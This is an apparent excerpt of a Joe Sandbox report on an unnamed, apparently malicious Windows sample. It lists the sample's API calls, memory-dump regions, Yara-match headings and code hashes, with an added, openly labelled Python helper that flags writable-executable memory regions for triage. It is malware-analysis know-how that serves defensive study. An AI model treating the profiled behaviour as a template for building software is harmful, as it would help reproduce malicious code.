                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: c394a820158a857472924a858012b0e2a9e1fec3136ac8767056c8ba5b5aa1da
                                • Instruction ID: 297c2206c4c8ec4be7d67b7b735e18b65f9acbb588b6ad94e5968090f0cdacef
                                • Opcode Fuzzy Hash: c394a820158a857472924a858012b0e2a9e1fec3136ac8767056c8ba5b5aa1da
                                • Instruction Fuzzy Hash: 7931A971D101589BCB61EFA4DE45FED73B8FF88310F1044A8BA1AAB281DE709E448B91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,009DA3D0,000000FF), ref: 009D2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 009D2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,009DA3D0,000000FF), ref: 009D2BA2
                                • wsprintfA.USER32 ref: 009D2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: baf89f377a14e3130dfb332b4535b0203a2102ac7436191d60f75203e5d5d243
                                • Instruction ID: 5f851957fe33118b3f4cc56b43f0e7f477569ee12cdb80c24c335b7191bb4db5
                                • Opcode Fuzzy Hash: baf89f377a14e3130dfb332b4535b0203a2102ac7436191d60f75203e5d5d243
                                • Instruction Fuzzy Hash: 7B0140B2944568ABCB149BC9DD45FBEB7BCFB4CB12F00011AF605A6280EB785540C7B1
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 009D4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 009D44AD
                                • CloseHandle.KERNEL32(00000000), ref: 009D44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 969d3c48ef189e0dfbdd451735ece1a3714b92c72b023ae4dae42813becdc9ff
                                • Instruction ID: 5041bf3adad3465b2f87037a624032f5f41e8b48b97db9209a52671d71533dc5
                                • Opcode Fuzzy Hash: 969d3c48ef189e0dfbdd451735ece1a3714b92c72b023ae4dae42813becdc9ff
                                • Instruction Fuzzy Hash: 5CF0FCB09416552BE7209B749D89BE676ECEF14304F0045A1FA49DB290DFB48CC48790
                                APIs
                                • __getptd.LIBCMT ref: 009D8FDD
                                  • Part of subcall function 009D87FF: __amsg_exit.LIBCMT ref: 009D880F
                                • __getptd.LIBCMT ref: 009D8FF4
                                • __amsg_exit.LIBCMT ref: 009D9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 009D9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 647fe4eefcf408365221e6edda5c393ad0b80082a3ac885e1815fb83282e4f2c
                                • Instruction ID: 3a9a4581cb8d853c36296af699ff9569a4cb0f9ec1b8b26fd1de21593fd3e3b2
                                • Opcode Fuzzy Hash: 647fe4eefcf408365221e6edda5c393ad0b80082a3ac885e1815fb83282e4f2c
                                • Instruction Fuzzy Hash: B6F096329C87109BD761BBB8A84775E73A16F40714F24C50BF444AB3D2DF645900E655
                                APIs
                                • lstrlen.KERNEL32(------,009B5BEB), ref: 009D731B
                                • lstrcpy.KERNEL32(00000000), ref: 009D733F
                                • lstrcat.KERNEL32(?,------), ref: 009D7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: e2e21a7744b73fe06d8dbd96d5853c75f90e0cfb310ce329193f68c7def3bba0
                                • Instruction ID: 0f36216185ecedc7fa40dee1c5cdbf13cff7809dea46f689db4c633f01b9ab6b
                                • Opcode Fuzzy Hash: e2e21a7744b73fe06d8dbd96d5853c75f90e0cfb310ce329193f68c7def3bba0
                                • Instruction Fuzzy Hash: 6AF0C9745117429FDB649F75E988926FAF9EF84705328882EA89AC7314EB30D840CB50
                                APIs
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 33b870c0fa570619884641fd56475ee6bc8ce8ac2bb3e781e8645fdaf9d8d42f
                                • Instruction ID: 764e5bb435835d983da48f767b6253cd3b9dad887633dd3bdf8c3710857fe73a
                                • Opcode Fuzzy Hash: 33b870c0fa570619884641fd56475ee6bc8ce8ac2bb3e781e8645fdaf9d8d42f
                                • Instruction Fuzzy Hash: 5712FB70E012019FDB28CF19C598B25B7E9BF45718B29C0ADE809DB3A2D776DD42CB42
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7CAF
                                  • Part of subcall function 009C7D40: std::_Xinvalid_argument.LIBCPMT ref: 009C7D58
                                  • Part of subcall function 009C7D40: std::_Xinvalid_argument.LIBCPMT ref: 009C7D76
                                  • Part of subcall function 009C7D40: std::_Xinvalid_argument.LIBCPMT ref: 009C7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 32812d619b4f27117f54fa92d56dd9ab778fed4f248de44939c98625905c3615
                                • Instruction ID: 0846d8c3142478ae75a70e007c8e1bee861e70b4431098c86a81a7c5c738e035
                                • Opcode Fuzzy Hash: 32812d619b4f27117f54fa92d56dd9ab778fed4f248de44939c98625905c3615
                                • Instruction Fuzzy Hash: 67310D727482128BD724DDDCE880F6AF7E9EF91750B20492EF582C7741C7719C408BA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 009B6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 47ca3dfc0cce7c41c964fa2ad78c42132911f6bfc21423bf73788d9177532cf0
                                • Instruction ID: 644a6077bf6644103b13ab4c3df7c0f4c8b00396d85cfdfe1f5c9da037b4a8c1
                                • Opcode Fuzzy Hash: 47ca3dfc0cce7c41c964fa2ad78c42132911f6bfc21423bf73788d9177532cf0
                                • Instruction Fuzzy Hash: 47218EB06006029BEB20CB20DD84BB673F8EB41714F444968F946CB685FBB9F945C750
                                APIs
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000), ref: 009B162D
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000,?), ref: 009B164F
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000,?), ref: 009B1671
                                  • Part of subcall function 009B1610: lstrcpy.KERNEL32(00000000,?), ref: 009B1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: a89caf0593a05b35e9d4219b05d6e4074d68b6ce8f50729181d6485dc97e5079
                                • Instruction ID: f9d1a388a85ae44872a2ce862677e238846727f571eb283572d71795639e77da
                                • Opcode Fuzzy Hash: a89caf0593a05b35e9d4219b05d6e4074d68b6ce8f50729181d6485dc97e5079
                                • Instruction Fuzzy Hash: 6F31E874A11B42AFD724DF3AC698996BBF9FF88311740492DA896C3B10DB70F811CB80
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 009D15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 4a5691f87a190e0951721de15f9ab77ffb119ebb6c989b178c0216eecd3a0405
                                • Instruction ID: e3d5c0c6fb8f3d5d1b3928e873add7016bfd8b33e10e9b80310a7dcbfe383230
                                • Opcode Fuzzy Hash: 4a5691f87a190e0951721de15f9ab77ffb119ebb6c989b178c0216eecd3a0405
                                • Instruction Fuzzy Hash: ED211C75611B02ABD724DF6AD654B17B7F9EF84710B04891DA486D7B40DB34F841CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 009B162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1693
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
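The "Memory Dump Source" lists above name each dump with dotted hexadecimal fields, and the values in the fifth and seventh fields (0x04, 0x40, 0x80 and 0x01000000) line up with the winnt.h page-protection and memory-type constants. The following is an added triage helper, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses those names, counts regions per protection, flags image-backed regions that are both writable and executable, and maps a call site such as the lstrcpy reference at 009B162D to the dump that most likely contains it. That the fifth field is the protection and the seventh the memory type is an assumption inferred from the values, and region sizes are not encoded in the name, so the address lookup is best-effort. The sample input is the 17 dump names copied from the list above.

```python
"""Decode the Joe Sandbox memory-dump names listed under "Memory Dump Source"
and flag image-backed regions that are both writable and executable."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# winnt.h constants. ASSUMPTION: the 5th dotted field of a dump name is the
# region's page protection and the 7th its memory type; this is inferred from
# the values seen (0x04/0x40/0x80 and 0x01000000), not from Joe Sandbox docs.
MEM_IMAGE = 0x01000000
PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE_EXECUTABLE = {0x40, 0x80}

DUMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<seq>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    pid: int
    base: int
    protect: int
    memtype: int

    @property
    def protect_name(self) -> str:
        return PROTECT_NAMES.get(self.protect & 0xFF, f"0x{self.protect:08X}")

    @property
    def writable_executable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE_EXECUTABLE


def parse_dump_name(name: str) -> DumpRegion:
    """Split one '<pid>.<phase>.<ts>.<base>.<protect>.<x>.<type>.<seq>.sdmp' name."""
    m = DUMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(name.strip(), int(m["pid"], 16), int(m["base"], 16),
                      int(m["protect"], 16), int(m["memtype"], 16))


def parse_dump_list(text: str) -> List[DumpRegion]:
    return [parse_dump_name(line) for line in text.splitlines() if line.strip()]


def protection_summary(regions: List[DumpRegion]) -> Dict[str, int]:
    """Count regions per protection name, to see how much of the image is RWX."""
    summary: Dict[str, int] = {}
    for r in regions:
        summary[r.protect_name] = summary.get(r.protect_name, 0) + 1
    return summary


def image_wx_regions(regions: List[DumpRegion], image_base: int) -> List[int]:
    """Bases of MEM_IMAGE regions at/above image_base that are writable+executable.
    Such pages in a mapped PE mean section rights were changed or a writable
    section has been written to: the unpacking/self-modification case."""
    return sorted(r.base for r in regions
                  if r.memtype == MEM_IMAGE and r.base >= image_base
                  and r.writable_executable)


def region_for(regions: List[DumpRegion], address: int) -> Optional[DumpRegion]:
    """Dump with the highest base not above `address`. Sizes are not encoded in
    the name, so mapping a 'ref: 009B162D' call site to a dump is best-effort."""
    below = [r for r in regions if r.base <= address]
    return max(below, key=lambda r: r.base) if below else None


# Constructed input: the 17 dump names from the report's Memory Dump Source list.
REPORT_DUMPS = """
00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
"""
IMAGE_BASE = 0x9B0000  # "Offset: 009B0000, based on PE: true" in the report

if __name__ == "__main__":
    regions = parse_dump_list(REPORT_DUMPS)
    print(protection_summary(regions))
    print([hex(b) for b in image_wx_regions(regions, IMAGE_BASE)])
    hit = region_for(regions, 0x9B162D)  # first lstrcpy call site listed above
    print(hit.name if hit else None, hit.protect_name if hit else None)
```

Run against the list above, every region is MEM_IMAGE and 15 of the 17 are writable and executable (13 PAGE_EXECUTE_READWRITE, 2 PAGE_EXECUTE_WRITECOPY); only the header region at 009B0000 and the one at 00BFA000 are plain PAGE_READWRITE. The lstrcpy call sites at 009B162D through 009B1693 fall in the 009B1000 dump, which is the RWX region that the function's Source File line names, so that dump is the one to load in IDA if you want the code as it ran rather than as it sits on disk.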
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 989f71687098ffce38a040ab63296c8be012d282d998f8fb11ac2d490ce01556
                                • Instruction ID: aaf284311adbc16c33de0d6ef8b19cea2a9eccfd5c21f12ec7fcb801f2255300
                                • Opcode Fuzzy Hash: 989f71687098ffce38a040ab63296c8be012d282d998f8fb11ac2d490ce01556
                                • Instruction Fuzzy Hash: A9112E74A11B02ABDB249F35D65C966B7FCFF44311758052DA89AC7B40EB30E801CB90